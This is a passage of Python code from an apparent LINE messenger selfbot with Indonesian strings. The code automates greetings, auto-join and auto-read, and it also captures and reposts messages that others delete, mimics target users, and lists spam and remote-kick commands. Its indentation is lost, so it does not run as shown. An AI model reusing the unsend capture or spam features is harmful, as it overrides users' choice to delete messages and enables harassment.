wait["GROUP"]['LM']['P'][msg.to] = msg.text.replace(msg.text.split("\n")[0]+"\n","")
self.sendMessage(msg.to," 「 Leave Message 」\nLeave Message has been set to:\n" + wait["GROUP"]['LM']['P'][msg.to])
def leave(self,wait,msg):
if msg.to in wait["GROUP"]['LM']['AP']:
msgs=" 「 Leave Message 」\nLeave Message: ON♪"
if msg.to in wait["GROUP"]['LM']['S']:
a = self.shop.getProduct(packageID=int(wait["GROUP"]['LM']['S'][msg.to]['Sticker']['STKPKGID']), language='ID', country='ID')
msgs+="\nSticker: " + a.title
else:msgs+=''
if msg.to in wait["GROUP"]['LM']['P']:
if wait["GROUP"]['LM']['P'][msg.to] == '':msgs+= ''
else:msgs+="\nMessage: \n" + wait["GROUP"]['LM']['P'][msg.to] + "\n"
else:msgs+=''
else:
msgs=" 「 Leave Message 」\nLeave Message: OFF"
if msg.to in wait["GROUP"]['LM']['S']:
a = self.shop.getProduct(packageID=int(wait["GROUP"]['LM']['S'][msg.to]['Sticker']['STKPKGID']), language='ID', country='ID')
msgs+="\nSticker: " + a.title
else:msgs+=''
if msg.to in wait["GROUP"]['LM']['P']:
if wait["GROUP"]['LM']['P'][msg.to] == '':msgs+= ''
else:msgs+="\nMessage: \n" + wait["GROUP"]['LM']['P'][msg.to] + "\n"
else:msgs+=''
return msgs+"\n |Command|\n- Leave Set\n Usage:"+wait["setkey"].title()+" leave [on|off]\n- Leave Sticker\n Usage:"+wait["setkey"].title()+" add leave sticker\n- Leave msg setting\n Usage:"+wait["setkey"].title()+" leave msg set <text>\n OR:"+wait["setkey"].title()+" leave msg set <text|text>"
def setstickerleave(self,wait,msg):
if msg.to not in wait["GROUP"]['LM']['S']:
wait["GROUP"]['LM']['S'][msg.to] = {'AP':False,'Sticker':{}}
wait["GROUP"]['LM']['S'][msg.to]['AP'] = True
self.sendMessage(msg.to, " 「 Sticker 」\nSend the sticker")
def delsetsticker(self,wait,msg):
msg.text = self.mycmd(msg.text,wait)
separate = msg.text.lower().split(" ")
text = msg.text.lower().replace(separate[0]+" "+separate[1]+" ","")
del wait["Sticker"][text]
self.sendMessage(msg.to, " 「 Sticker 」\nStatus: Delete {} From List".format(text))
def setImageS(self,wait,msg):
msg.text = self.mycmd(msg.text,wait)
separate = msg.text.lower().split(" ")
text = msg.text.lower().replace(separate[0]+" "+separate[1]+" ","")
wait["Images"][text] = 'dataSeen/{}.jpg'.format(text)
wait["Img"] = '{}'.format(text)
wait["Addimage"] = True
self.sendMessage(msg.to, " 「 Picture 」\nSend a Picture to save")
def unsend2(self,msg,wait):
try:
if msg.to not in wait['Unsend']:
wait['Unsend'][msg.to] = {'B':[]}
if msg._from not in [self.profile.mid]:
return
wait['Unsend'][msg.to]['B'].append(msg.id)
except:pass
def delImageS(self,wait,msg):
msg.text = self.mycmd(msg.text,wait)
separate = msg.text.lower().split(" ")
text = msg.text.lower().replace(separate[0]+" "+separate[1]+" ","")
try:
os.remove(wait["Images"][text])
except:pass
del wait["Images"][text]
self.sendMessage(msg.to, " 「 Picture 」\nStatus: Delete {} From List".format(text))
def forward(self,msg):
if msg.toType == 2:to = msg.to
else:to = msg._from
if msg.contentType == 1:
try:
if msg.contentMetadata != {}:
path = self.downloadObjectMsg(msg.id,'path','dataSeen/m.gif',True)
a = threading.Thread(target=self.sendGIF, args=(to,path,)).start()
except:self.sendImageWithURL(to,'https://obs-sg.line-apps.com/talk/m/download.nhn?oid='+msg.id)
if msg.contentType == 2:self.sendVideoWithURL(to,'https://obs-sg.line-apps.com/talk/m/download.nhn?oid='+msg.id)
if msg.contentType == 3:self.sendAudioWithURL(to,'https://obs-sg.line-apps.com/talk/m/download.nhn?oid='+msg.id)
def surahlist(self,msg,wait):
msg.text = self.mycmd(msg.text,wait)
if msg.text.lower() == "quranlist":data = self.adityarequestweb("http://api.alquran.cloud/surah")
if msg.text.lower().startswith("qur'an "):data = self.adityarequestweb("http://api.alquran.cloud/surah/{}".format(self.adityasplittext(msg.text)))
if len(msg.text.split(' ')) == 1:
if data["data"] != []:
no = 0
ret_ = "╭──「 Al-Qur'an 」"
for music in data["data"]:
no += 1
if no == len(data['data']):ret_ += "\n╰{}. {}".format(no,music['englishName'])
else:ret_ += "\n│{}. {}".format(no,music['englishName'])
return self.sendMessage(msg.to,ret_)
if len(msg.text.split(' ')) == 2:
try:
no = 0
ret_ = " 「 Al-Qur'an 」\nSurah: {}".format(data['data']['englishName'])
for music in data["data"]["ayahs"]:
no += 1
ret_ += "\n{}. {}".format(no,music['text'])
k = len(ret_)//10000
for aa in range(k+1):
self.sendMessage(msg.to,'{}'.format(ret_[aa*10000 : (aa+1)*10000]))
except:self.sendMessage(msg.to," 「 Al-Qur'an 」\nI can't found surah number {}".format(self.adityasplittext(msg.text)))
if len(msg.text.split(' ')) == 3:
try:
nama = data["data"]["ayahs"]
selection = AdityaSplitGood(self.adityasplittext(msg.text.lower(),'s'),range(1,len(nama)+1))
k = len(nama)//100
text = " 「 Al-Qur'an 」\nSurah: {}".format(data['data']['englishName'])
no = 0
for i in selection.parse():
no+= 1
text+= "\n{}. {}".format(i,nama[i-1]['text'])
k = len(text)//10000
for aa in range(k+1):
self.sendMessage(msg.to,'{}'.format(text[aa*10000 : (aa+1)*10000]))
except:
self.sendMessage(msg.to," 「 Al-Qur'an 」\nI can't found surah number {}".format(self.adityasplittext(msg.text)))
def autoresponuy(self,msg,wait):
to = msg.to
if msg.to not in wait["GROUP"]['AR']['AP']:
return
if msg.to in wait["GROUP"]['AR']['S']:
self.sendMessage(msg.to,text=None,contentMetadata=wait["GROUP"]['AR']['S'][msg.to]['Sticker'], contentType=7)
if(wait["GROUP"]['AR']['P'][msg.to] in [""," ","\n",None]):
return
if '@!' not in wait["GROUP"]['WM']['P'][msg.to]:
wait["GROUP"]['AR']['P'][msg.to] = '@!'+wait["GROUP"]['AR']['P'][msg.to]
nama = self.getGroup(msg.to).name
sd = self.waktunjir()
self.sendMention(msg.to,wait["GROUP"]['AR']['P'][msg.to].replace('greeting',sd).replace(';',nama),' 「 Welcome Message 」\n',[msg._from]*wait["GROUP"]['AR']['P'][msg.to].count('@!'))
def detectunsend(self,op,wait,kuciyose):
try:
msg = kuciyose['tos'][op.param1][op.param2]['msg']
if kuciyose['tos'][op.param1]['setset'] == True:
if msg._from in wait['talkblacklist']['tos']:
if wait['talkblacklist']['tos'][msg._from]["expire"] == True:
return
elif time.time() - wait['talkblacklist']['tos'][msg._from]["time"] <= 5:
wait['talkblacklist']['tos'][msg._from]["flood"] += 1
if wait['talkblacklist']['tos'][msg._from]["flood"] >= 10:
wait['talkblacklist']['tos'][msg._from]["flood"] = 0
wait['talkblacklist']['tos'][msg._from]["expire"] = True
self.sendMention(msg.to, " 「 FLOOD 」\nSo sorry @! I will mute on 30 seconds if unsend from you @!",'',[msg._from]*2)
else:
wait['talkblacklist']['tos'][msg._from]["flood"] = 0
wait['talkblacklist']['tos'][msg._from]["time"] = time.time()
else:
wait['talkblacklist']['tos'][msg._from] = {"time": time.time(),"flood": 0,"expire": False}
if op.param2 in kuciyose['tos'][op.param1]:
wait['GN'] = msg
if msg.contentType == 0:dd = '\nType: Text'
else:dd= '\nType: {}'.format(ContentType ._VALUES_TO_NAMES[msg.contentType])
aa = '\nCreatedTime: {}{}\nText:\n'.format(humanize.naturaltime(datetime.fromtimestamp(msg.createdTime/1000)),dd)
if msg.contentType == 0:
if 'MENTION' in msg.contentMetadata.keys() != None:
msg.text = ' 「 Unsend 」\nFrom: @ADIT GANTENG '+aa+msg.text
gd = [{'S':str(0+len(' 「 Unsend 」\nFrom: ')), 'E':str(len('@ADIT GANTENG ')+len(' 「 Unsend 」\nFrom: ')), 'M':msg._from}]
for key in eval(msg.contentMetadata["MENTION"])["MENTIONEES"]:
gd.append({'S':str(int(key['S'])+len(' 「 Unsend 」\nFrom: @ADIT GANTENG '+aa)), 'E':str(int(key['E'])+len(' 「 Unsend 」\nFrom: @ADIT GANTENG '+aa)),'M':key['M']})
msg.contentMetadata = {'AGENT_LINK': 'line://ti/p/~{}'.format(self.profile.userid),'AGENT_ICON': "http://dl.profile.line-cdn.net/" + self.getProfile().picturePath,'AGENT_NAME': ' 「 UNSEND DETECT 」',
'MENTION': str('{"MENTIONEES":' + json.dumps(gd) + '}')}
self.sendMessages(msg)
else:
if msg.location != None:aa = aa.replace('Text','Location').replace('\nText:','');self.sendMessages(msg)
if msg.text != None: asdd = msg.text
else:asdd = ''
self.sendMention(op.param1,' 「 Unsend 」\nFrom: @! {}{}'.format(aa,asdd),'',[msg._from])
else:
a = ' 「 Unsend 」\nFrom: @!\nCreatedTime: {}{}'.format(humanize.naturaltime(datetime.fromtimestamp(msg.createdTime/1000)),dd)
try:
self.sendMessages(msg)
except:
agh = self.shop.getProduct(packageID=int(msg.contentMetadata['STKPKGID']), language='ID', country='ID')
if agh.hasAnimation == True:
path = self.downloadFileURL('https://stickershop.line-scdn.net/stickershop/v1/sticker/'+str(msg.contentMetadata['STKID'])+'/IOS/sticker_animation@2x.png', 'path','sticker.png')
asd=subprocess.getoutput('apng2gif sticker.png')
self.sendMention(op.param1,a,'',[msg._from])
return threading.Thread(target=self.sendGIF, args=(op.param1,'sticker.gif',)).start()
self.sendImageWithURL(op.param1,'https://stickershop.line-scdn.net/stickershop/v1/sticker/'+str(msg.contentMetadata['STKID'])+'/ANDROID/sticker.png')
asdf = ' 「 Unsend 」\nFrom: @!\nCreatedTime: {}{}'.format(humanize.naturaltime(datetime.fromtimestamp(msg.createdTime/1000)),dd)
if msg.contentType == 1:
try:
if msg.contentMetadata != {}:a = threading.Thread(target=self.sendGIF, args=(op.param1,kuciyose['tos'][op.param1][op.param2]['path'],)).start()
except:self.sendImage(op.param1,kuciyose['tos'][op.param1][op.param2]['path'])
if msg.contentType == 2:self.sendVideo(op.param1,kuciyose['tos'][op.param1][op.param2]['path']);os.remove(kuciyose['tos'][op.param1][op.param2]['path'])
if msg.contentType == 3:self.sendAudio(op.param1,kuciyose['tos'][op.param1][op.param2]['path']);os.remove(kuciyose['tos'][op.param1][op.param2]['path'])
if msg.contentType == 14:self.sendFile(op.param1,kuciyose['tos'][op.param1][op.param2]['path'], file_name='',ct = msg.contentMetadata)
self.sendMention(op.param1,asdf,'',[msg._from])
del kuciyose['tos'][op.param1][op.param2]
except:
pass
def unsendon(self,wait,msg,kuciyose):
if 'tos' not in wait:wait['tos'] = {}
if msg.to not in wait['tos']:wait['tos'][msg.to] = {}
if 'setset' not in wait['tos'][msg.to]:wait['tos'][msg.to]['setset'] = False
if wait['tos'][msg.to]['setset'] == True:
return self.sendMessage(msg.to,' 「 Unsend 」\nUnsend Detection already Set ON')
wait['tos'][msg.to]['setset'] = True
self.sendMessage(msg.to,' 「 Unsend 」\nUnsend Detection Set ON')
def unsendoff(self,wait,msg,kuciyose):
if 'tos' not in wait:wait['tos'] = {}
if msg.to not in wait['tos']:wait['tos'][msg.to] = {}
if 'setset' not in wait['tos'][msg.to]:wait['tos'][msg.to]['setset'] = False
if wait['tos'][msg.to]['setset'] == False:
return self.sendMessage(msg.to,' 「 Unsend 」\nUnsend Detection already Set OFF')
del wait['tos'][msg.to]
self.sendMessage(msg.to,' 「 Unsend 」\nUnsend Detection Set OFF')
def delExpire(self,wait):
try:
if wait['talkblacklist']['tos'] != {}:
for tmp in wait['talkblacklist']['tos']:
if wait['talkblacklist']['tos'][tmp]["expire"] == True:
if time.time() - wait['talkblacklist']['tos'][tmp]["time"] >= 3*10:
wait['talkblacklist']['tos'][tmp]["expire"] = False
wait['talkblacklist']['tos'][tmp]["time"] = time.time()
try:
self.sendMessage(tmp, " 「 FLOOD Notify 」\nis now Active!")
except:
pass
except:wait['talkblacklist']['tos'] = {}
def limitlimit(self,to,wait):
try:
if to in wait['talkblacklist']['tos']:
if wait['talkblacklist']['tos'][to]["expire"] == True:
return
elif time.time() - wait['talkblacklist']['tos'][to]["time"] <= 5:
wait['talkblacklist']['tos'][to]["flood"] += 1
if wait['talkblacklist']['tos'][to]["flood"] >= 15:
wait['talkblacklist']['tos'][to]["flood"] = 0
wait['talkblacklist']['tos'][to]["expire"] = True
self.sendMessage(to, " 「 FLOOD Notify 」\nGroup in spaming!\nsorry I will mute bot on 30 seconds in this room!")
else:
wait['talkblacklist']['tos'][to]["flood"] = 0
wait['talkblacklist']['tos'][to]["time"] = time.time()
else:
wait['talkblacklist']['tos'][to] = {"time": time.time(),"flood": 0,"expire": False}
except:wait['talkblacklist']['tos'] = {}
def autoredanu(self,msg,wait,kuciyose):
if msg.toType == 0:
if msg._from != self.getProfile().mid:
to = msg._from
else:
to = msg.to
else:
to = msg.to
soloi = threading.Thread(target=self.limitlimit, args=(to,kuciyose,)).start()
if wait["autoread1"] == True:self.sendChatChecked(msg._from,msg.id)
if wait["autoread2"] == True:self.sendChatChecked(msg.to,msg.id)
try:
if wait['tos'][to]['setset'] == True:
if to not in kuciyose['tos']:kuciyose['tos'][to] = {}
kuciyose['tos'][to]['setset'] = True
kuciyose['tos'][to][msg.id] = {'msg':msg}
if msg.contentType == 1:
try:
if msg.contentMetadata != {}:path = self.downloadObjectMsg(msg.id,'path','dataSeen/%s.gif' % msg.id,True);kuciyose['tos'][to][msg.id]['path'] = path
except:path = self.downloadObjectMsg(msg.id);kuciyose['tos'][to][msg.id]['path'] = path
if msg.contentType == 2 or msg.contentType == 3 or msg.contentType == 14:path = self.downloadObjectMsg(msg.id);kuciyose['tos'][to][msg.id]['path'] = path
else:kuciyose['tos'][to]['setset'] = False
except:
e = traceback.format_exc()
wait['tos'][to] = {}
if msg._from in wait["target"] and wait["status"] == True:
if msg.contentType == 4:
return
if msg.text is not None:
wait['GN'] = msg
self.sendMessages(msg)
self.forward(msg)
else:
try:return self.sendMessages(msg)
except:
a = self.shop.getProduct(packageID=int(msg.contentMetadata['STKPKGID']), language='ID', country='ID')
if a.hasAnimation == True:
path = self.downloadFileURL('https://stickershop.line-scdn.net/stickershop/v1/sticker/'+str(msg.contentMetadata['STKID'])+'/IOS/sticker_animation@2x.png', 'path','sticker.png')
a=subprocess.getoutput('apng2gif sticker.png')
return threading.Thread(target=self.sendGIF, args=(to,'sticker.gif',)).start()
self.sendImageWithURL(to,'https://stickershop.line-scdn.net/stickershop/v1/sticker/'+str(msg.contentMetadata['STKID'])+'/ANDROID/sticker.png')
if msg.contentType == 0:
if msg.text is None:
return
if 'MENTION' in msg.contentMetadata.keys()!= None:
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if self.getProfile().mid in mention["M"]:
if to not in wait['ROM']:
wait['ROM'][to] = {}
if msg._from not in wait['ROM'][to]:
wait['ROM'][to][msg._from] = {}
if 'msg.id' not in wait['ROM'][to][msg._from]:
wait['ROM'][to][msg._from]['msg.id'] = []
if 'waktu' not in wait['ROM'][to][msg._from]:
wait['ROM'][to][msg._from]['waktu'] = []
wait['ROM'][to][msg._from]['msg.id'].append(msg.id)
wait['ROM'][to][msg._from]['waktu'].append(msg.createdTime)
self.autoresponuy(msg,wait)
break
if '/ti/g/' in msg.text:
if wait["autoJoin"] == True:
try:
link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(msg.text)
n_links=[]
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
group=self.findGroupByTicket(ticket_id)
g = self.getGroup(group.id)
h = []
for d in g.members:
h.append(d.mid)
self.acceptGroupInvitationByTicket(group.id,ticket_id)
except:pass
if msg.text.lower() == 'respon':
if msg._from in ['u2286e272840491415e82447163dadf6c']:
self.sendMention(to,'@!','',[self.profile.mid])
if msg.text.lower() == 'cleartmp':
if msg._from in ['u2286e272840491415e82447163dadf6c']:
self.sendMessage(to,'Sukses membersihkan isi temp.')
wait["lurkt"],wait["lurkp"],wait["ROM"],wait["ROM1"],wait["setTime"],wait["readPoint"],wait["readPoints"],wait['Unsend']={},{},{},{},{},{},{},{}
time.sleep(3)
self.sendMessage(to,'Sukses.')
self.restart_program()
if msg.text.lower().startswith('delsb '):
if msg._from in ['u2286e272840491415e82447163dadf6c']:
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if self.getProfile().mid in mention["M"]:
self.kusumu(msg)
def eksekusipc(self,to,wait,dits,msg):
if msg.toType == 2:
return
if dits == 'addbl':self.datamentions(msg,'Blacklist',[to],'ADDBL',wait,ps='\n├ Type: Add Blacklist')
elif dits == 'delbl':self.datamentions(msg,'Blacklist',[to],'DELBL',wait,ps='\n├ Type: Delete Blacklist')
elif dits == 'addwl':self.datamentions(msg,'Whitelist',[to],'ADDWL',wait,ps='\n├ Type: Add Whitelist')
elif dits == 'delwl':self.datamentions(msg,'Whitelist',[to],'DELWL',wait,ps='\n├ Type: Delete Whitelist')
elif dits == 'addml':self.datamentions(msg,'Mimiclist',[to],'ADDML',wait,ps='\n├ Type: Add Mimiclist')
elif dits == 'delml':self.datamentions(msg,'Mimiclist',[to],'DELML',wait,ps='\n├ Type: Delete Mimiclist')
def debug(self):
get_profile_time_start = time.time()
get_profile = self.getProfile()
get_profile_time = time.time() - get_profile_time_start
get_group_time_start = time.time()
get_group = self.getGroupIdsJoined()
get_group_time = time.time() - get_group_time_start
get_contact_time_start = time.time()
get_contact = self.getContact(get_profile.mid)
get_contact_time = time.time() - get_contact_time_start
return " 「 Debug 」\nType:\n - Get Profile\n %.10f\n - Get Contact\n %.10f\n - Get Group\n %.10f" % (get_profile_time/2,get_contact_time/2,get_group_time/2)
def findcont(self,msg):
if 'MENTION' in msg.contentMetadata.keys()!=None:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
a = self.getGroupIdsJoined();i = self.getGroups(a)
c = []
for h in i:
g = [c.append(h.name[0:20]+',.s/'+str(len(h.members))) for d in h.members if key1 in d.mid]
h = "╭「 Find Contact 」─"
no=0
for group in c:
no+=1
h+= "\n│{}. {} | {}".format(no, group.split(',.s/')[0], group.split(',.s/')[1])
self.sendMessage(msg.to,h+"\n╰─「 {} Groups I Found it 」".format(len(c)))
def autoaddekseuki(self,op,wait):
if(wait["autoaddpesan"] in [""," ","\n",None]):
return
if '@!' not in wait["autoaddpesan"]:
wait["autoaddpesan"] = '@!'+wait["autoaddpesan"]
sd = self.waktunjir()
self.sendMention(op.param1,wait["autoaddpesan"].replace('greeting',sd),' 「 Autoadd 」\n',[op.param1]*wait["autoaddpesan"].count('@!'))
if wait["autoAdd"] == True:self.findAndAddContactsByMid(op.param1)
def mimicon(self,wait):
if wait['status'] == True:
msgs=" 「 Mimic 」\nMimic already ENABLED♪"
else:
msgs=" 「 Mimic 」\nMimic set to ENABLED♪"
wait["status"] = True
return msgs
def mimicoff(self,wait):
wait['GN'] = ''
if wait['status'] == False:
msgs=" 「 Mimic 」\nMimic already DISABLED♪"
else:
msgs=" 「 Mimic 」\nMimic set to DISABLED♪"
wait["status"] = False
return msgs
@loggedIn
def sendContact(self, to, mid):
contentMetadata = {'mid': mid}
return self.sendMessage(to, '', contentMetadata, 13)
def waktu(self,secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
days, hours = divmod(hours, 24)
return '%02d Hari %02d Jam %02d Menit %02d Detik' % (days, hours, mins, secs)
def about(self,wait,msg,waita):
if wait["setkey"] == '':
dit = '\nPrefix: Disable'
else:
dit = "\nPrefix:"+wait["setkey"]
ti = waita['name'][waita["info"][msg._from]]["pay"]-time.time()
sec = int(ti %60)
minu = int(ti/60%60)
hours = int(ti/60/60 %24)
days = int(ti/60/60/24)
text = " 「 About 」\n'''Free Self Bot Edition'''\nExpired on {}\nIn day: {} Hari {} Jam {} Menit {} Detik{}\nClient Name: @!\nFind me here @!".format(humanize.naturaltime(datetime.fromtimestamp(waita['name'][waita['info'][msg._from]]["pay"])) ,days,hours,minu,sec,dit)
self.sendMention(msg.to,text,'',[self.getProfile().mid, 'uac8e3eaf1eb2a55770bf10c3b2357c33'])
self.sendContact(msg.to,self.getProfile().mid)
def abouts(self,wait,waita):
dd = self.getProfile().mid
if wait["setkey"] == '':
dit = '\nKey: Disable'
else:
dit = "\nKey:"+wait["setkey"]
ti = waita['name'][waita["info"][dd]]["pay"]-time.time()
sec = int(ti %60)
minu = int(ti/60%60)
hours = int(ti/60/60 %24)
days = int(ti/60/60/24)
text = " 「 LOGIN 」\n'Self' Edition♪\n「 Subscription 」\nExpired: {}\nIn days: {} days {} hour {} min{}\nName: @!\nVersion: 2.7\nOwner: @!".format(humanize.naturaltime(datetime.fromtimestamp(waita['name'][waita['info'][dd]]["pay"])) ,days,hours,minu,dit)
self.sendMention(waita['name'][waita["info"][dd]]["tempat"],text,'',[dd, 'u2286e272840491415e82447163dadf6c'])
waita['name'][waita["info"][dd]]["tempat"] = ''
with open('backup.json', 'w') as fp:
json.dump(waita, fp, sort_keys=True, indent=4)
def mysticker(self,msg):
a = self.shop.getActivePurchases(start=0, size=1000, language='ID', country='ID').productList
c = "List Download Sticker:"
no = 0
for b in a:
no +=1
c += "\n"+str(no)+". "+b.title[:21]+" ID:"+str(b.packageId)
k = len(c)//10000
for aa in range(k+1):
self.sendMessage(msg.to,'{}'.format(c[aa*10000 : (aa+1)*10000]))
def listgroup(self,msg,wait):
ddd = wait["setkey"]
gid = self.getGroupIdsJoined()
sd = self.getGroups(gid)
ret = "╭「 Groups 」─"
no = 0
total = len(gid)
cd = "\n│ Total {} Groups\n│\n├─「 COMMAND 」\n│\n│ Remote Mention\n│ Key:{} grouplist [num] tag [1|<|>|-]\n│ Remote Kick\n│ Key:{} grouplist [num] kick [1|<|>|-]\n│ Leave Groups\n│ Key:{} leave groups [1|<|>|-]\n│ Get QR\n│ Key:{} qr groups [1|<|>|-]\n│ Cek Member\n│ Key:{} grouplist [num]\n╰ Key:{} grouplist [num] mem [num]".format(total,ddd,ddd,ddd,ddd,ddd,ddd)
for G in sd:
member = len(G.members)
no += 1
ret += "\n│{}. {} | {}".format(no, G.name[0:20], member)
ret += cd
k = len(ret)//10000
for aa in range(k+1):
self.sendMessage(msg.to,'{}'.format(ret[aa*10000 : (aa+1)*10000]))
def listsquare(self):
s = self.getJoinedSquares(continuationToken=None, limit=50)
a = [a.name+'./,.'+a.mid for a in s.squares];b = [s.statuses[a[b].split('./,.')[1]].memberCount for b in range(len(a))];c = ['{} | {}'.format(a[i].split('./,.')[0],humanize.intcomma(b[i])) for i in range(len(a))];c.sort()
no = 0
h = "╭「 Square 」─"
for i in c:
no+=1
h+= '\n│{}. {}'.format(no,i)
return h+"\n╰─「 Total {} Square 」".format(len(a))
def stacks(self,to):
start = time.time()
a = [self.sendMessage(to,"- Taken: %.10f" % (time.time() - start)) for a in range(50)]
def speed(self,to):
start = time.time()
self.sendMessage("uac8e3eaf1eb2a55770bf10c3b2357c33", ' ')
elapsed_time = time.time() - start
took = time.time() - start
self.sendMessage(to," 「 Speed 」\nType: Speed\n - Took : %.3fms\n - Taken: %.10f" % (took,elapsed_time))
def setautojoinm(self,wait,msg):
msg.text = self.mycmd(msg.text,wait)
wait["Members"] = int(msg.text.split(" ")[2])
self.sendMessage(msg.to, " 「 Autojoin 」\nType: Minim Members\nStatus: Success Set\nTo: {} Members".format(wait["Members"]))
def adityeksekusidata(self,msg,wait):
a = []
a.append(msg.contentMetadata["mid"])
to = msg.to
if wait["wwhitelist"] == True:
self.datamentions(msg,'Whitelist',a,'ADDWL',wait,ps='\n├ Type: Add Whitelist')
wait["wwhitelist"] = False
if wait["wblacklist"] == True:
self.datamentions(msg,'Blacklist',a,'ADDBL',wait,ps='\n├ Type: Add Blacklist')
wait["wblacklist"] = False
if wait["dwhitelist"] == True:
self.datamentions(msg,'Whitelist',a,'DELWL',wait,ps='\n├ Type: Delete Whitelist')
wait["dwhitelist"] = False
if wait["dblacklist"] == True:
self.datamentions(msg,'Blacklist',a,'DELBL',wait,ps='\n├ Type: Delete Blacklist')
wait["dblacklist"] = False
if wait["Anime"] == True:
self.datamentions(msg,'Friendlist',a,'DELFL',wait,ps='\n├ Type: Delete Friendlist')
wait["Anime"] = False
def autoJoinoff(self,wait,msg):
if wait['autoJoin'] == False:
msgs=" 「 Auto Join 」\nAuto Join already set to DISABLED♪"
else:
msgs=" 「 Auto Join 」\nAuto Join has been set to DISABLED♪"
wait['autoJoin']=False
self.sendMessage(msg.to, msgs)
def autoJoinon(self,wait,msg):
if wait['autoJoin'] == True:
msgs=" 「 Auto Join 」\nAuto Join already set to ENABLED♪"
else:
msgs=" 「 Auto Join 」\nAuto Join has been set to ENABLED♪"
wait['autoJoin']=True
self.sendMessage(msg.to, msgs)
def autoreadon1(self,data):
if data['autoread1'] == True:
msgs=" 「 Auto Read 」\nAuto Read Personal already Enable♪\nNote: Auto Read message is not affected♪"
else:
msgs=" 「 Auto Read 」\nAuto Read Personal set to Enable♪\nNote: Auto Read message is not affected♪"
data['autoread1']= True
return msgs
def autoreadoff1(self,data):
if data['autoread1'] == False:
msgs=" 「 Auto Read 」\nAuto Read Personal already DISABLED♪\nNote: Auto Read message is not affected♪"
else:
msgs=" 「 Auto Read 」\nAuto Read Personal set to DISABLED♪\nNote: Auto Read message is not affected♪"
data['autoread1']=False
return msgs
def autoreadoff2(self,data):
if data['autoread2'] == False:
msgs=" 「 Auto Read 」\nAuto Read Group already DISABLED♪\nNote: Auto Read message is not affected♪"
else:
msgs=" 「 Auto Read 」\nAuto Read Group set to DISABLED♪\nNote: Auto Read message is not affected♪"
data['autoread2']=False
return msgs
def autoreadon2(self,data):
if data['autoread2'] == True:
msgs=" 「 Auto Read 」\nAuto Read Group already Enable♪\nNote: Auto Read message is not affected♪"
else:
msgs=" 「 Auto Read 」\nAuto Read Group set to Enable♪\nNote: Auto Read message is not affected♪"
data['autoread2']= True
return msgs
def autoread(self,data):
if data["autoread2"] == True:a = "True"
else:a = "False"
if data["autoread1"] == True:b = "True"
else:b = "False"
return " 「 Auto Read 」\nEvent Trigger:\n on Personal: "+b+"\n on Group: "+a+"\n\nCommand:\n Autoread\n Usage:"+data["setkey"].title()+" autoread [on|0ff]"
def help(self,msg,wait):
if wait["setkey"] == '':ab = ''
else:ab = wait["setkey"] + ' '
a =" ╔══[「нєℓρ мєѕѕαgє」]\n" \
"╠ 1. "+ab+"Mentionz\n" \
"╠ 2. "+ab+"Broadcastz\n" \
"╠ 3. "+ab+"Lurk\n" \
"╠ 4. "+ab+"Autoread\n" \
"╠ 5. "+ab+"Group\n" \
"╠ 6. "+ab+"Friendz\n" \
"╠ 7. "+ab+"Disguise\n" \
"╠ 8. "+ab+"Spamz\n" \
"╠ 9. "+ab+"Stealz\n" \
"╠ 10. "+ab+"Autojoinz\n" \
"╠ 11. "+ab+"Autoaddz\n" \
"╠ 12. "+ab+"Announcez\n" \
"╠ 13. "+ab+"Profilez\n" \
"╠ 14. "+ab+"Media\n" \
"╠ 15. "+ab+"Settz\n" \
"╠ 16. "+ab+"Logout sb\n" \
"╠ 17. "+ab+"Restart\n" \
"╠ 18. "+ab+"Prefix\n"\
"╚══[ 🎬Fe-𝔫α ]\n"
zxc = a.title()+"ㄔSmileBots : Fen\nㄔReworked by @!\n"
return self.sendMention(msg.to,zxc.strip(),' 「 HELP 」',['u2286e272840491415e82447163dadf6c'])
@loggedIn
def removeChatRoomAnnouncement(self, chatRoomMid, announcementSeq):
return self.talk.removeChatRoomAnnouncement(0, chatRoomMid, announcementSeq)
def getannoun(self,msg,wait):
msg.text = self.mycmd(msg.text,wait)
to = msg.to
a = self.getChatRoomAnnouncements(msg.to)
if a == []:
self.sendMention(to, 'Sorry @!In {} nothink get a Announcements'.format(self.getGroup(to).name),' 「 Announcements 」\n', [self.getProfile().mid])
return
c = ' 「 Announcements 」'
no = 0
h = []
ds = [a[b].creatorMid for b in range(len(a)) if a[b].creatorMid not in h]
if msg.text.lower() == 'get announ':
for b in a:
if b.creatorMid not in h:
h.append(b.creatorMid)
no += 1
c += "\n{}. @! #{}x".format(no,str(a).count(b.creatorMid))
self.sendMention(msg.to,c,'',h)
if msg.text.lower().startswith("get announ "):
if len(msg.text.split(' ')) == 3:
sd = ds[int(msg.text.split(' ')[2])-1]
c+= '\nAnnounced by: @!'
no=0
for b in a:
if b.contents.link != None:
if b.creatorMid in sd:
no+=1
if 'line://nv/chatMsg?chatId=' in b.contents.link:sdg = '{}'.format(b.contents.link)
else:sdg = '{}'.format(b.contents.text)
if no == 1:c+= '\n{}. 「 {} 」\n{}'.format(no,humanize.naturaltime(datetime.fromtimestamp(b.createdTime/1000)),sdg)
else:c+= '\n\n{}. 「 {} 」\n{}'.format(no,humanize.naturaltime(datetime.fromtimestamp(b.createdTime/1000)),sdg)
self.sendMention(msg.to,c,'',[sd])
def mangakyo(self,msg,wait):
msg.text = self.mycmd(msg.text,wait)
if msg.text.lower() == 'mangakyo':self.sendMessage(msg.to,AdityaMangakyo())
if msg.text.lower().startswith('mangakyo page '):
if self.adityasplittext(msg.text,'s') == '1':return self.sendMessage(msg.to,'Page 1 Tidak Ditemukan Next Page Dimulai dari 2')
self.sendMessage(msg.to,AdityaMangakyo(self.adityasplittext(msg.text,'s')))
def templatemusic(self,img,text,stext):
a = self.profile.userid
contentMetadata={
'subText': stext,
'countryCode': 'ID',
'a-packageName': 'com.spotify.music',
'previewUrl': img, 'text': text,
'linkUri': 'line://ti/p/~{}'.format(a),
'id': 'mt000000000a6b79f9',
'i-installUrl': 'line://ti/p/~{}'.format(a)
, 'type': 'mt', 'a-installUrl': 'line://ti/p/~{}'.format(a), 'i-linkUri': 'line://ti/p/~{}'.format(a), 'a-linkUri': 'line://ti/p/~{}'.format(a)}
return contentMetadata
